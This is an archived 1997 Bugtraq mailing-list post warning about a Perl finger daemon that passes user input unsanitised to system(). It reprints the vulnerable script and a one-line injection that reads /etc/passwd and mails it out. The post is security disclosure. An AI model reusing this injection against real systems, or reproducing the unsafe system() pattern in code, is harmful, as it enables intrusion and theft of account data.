Bugtraq mailing list archives
perl fingerd stupidity
From: chris () VIPER NET (Chris Terry)
Date: Thu, 31 Jul 1997 14:34:43 -0500
Watch out for the perl fingerd currently posted at ftp://sunsite.unc.edu/pub/Linux/network/finger/daemons #!/usr/bin/perl # fingerd - a simple finger daemon $user = <STDIN>; chop($user); chop($user); if(-e "/usr/lib/finger/$user"){ system "/usr/bin/perl /usr/lib/finger/$user"; } else { system "/usr/bin/perl /usr/lib/finger/default $user"; } [root@batleh perl-finger]# ./fingerd |cat /etc/passwd|mail chris () viper net and many others.... ----------------------------------------------------------- CGI Joe - n. A hard-core CGI script programmer with all the social skills and charisma of a plastic action figure. See "Chris Terry" Chris Terry - n. ITC^DeltaCom Web/CGI guy chris () viper net In a world without fences, who needs Gates??
Current thread:
- Re: BIND Nuking, (continued)
- Re: BIND Nuking Thomas H. Ptacek (Jul 29)
- ANNOUNCE: inn-1.5.1sec (fwd) Christopher Samuel (Jul 30)
- Re: Security hole in mgetty+sendfax Gert Doering (Jul 25)
- BIND Nuking Nicolas Dubee (Jul 25)
- Re: your mail Ariel Biener (Jul 25)
- Re: request-route Zoltan Hidvegi (Jul 28)
- Re: request-route Eric Bennett (Jul 29)
- Re: request-route John Macdonald (Jul 29)
- Re: request-route Kragen Sitaker (Jul 30)
- Re: request-route John Macdonald (Jul 31)
- perl fingerd stupidity Chris Terry (Jul 31)
- HP Security Bulletins Digest Aleph One (Jul 31)
- Re: request-route Mihai SANDU (Jul 26)
- Netspace Singapore Privacy Bug Aleph One (Jul 26)
- Re: your mail Alan Cox (Jul 27)
- Re: Solaris2.5.1 dtlogin core Andrew Hobgood (Jul 24)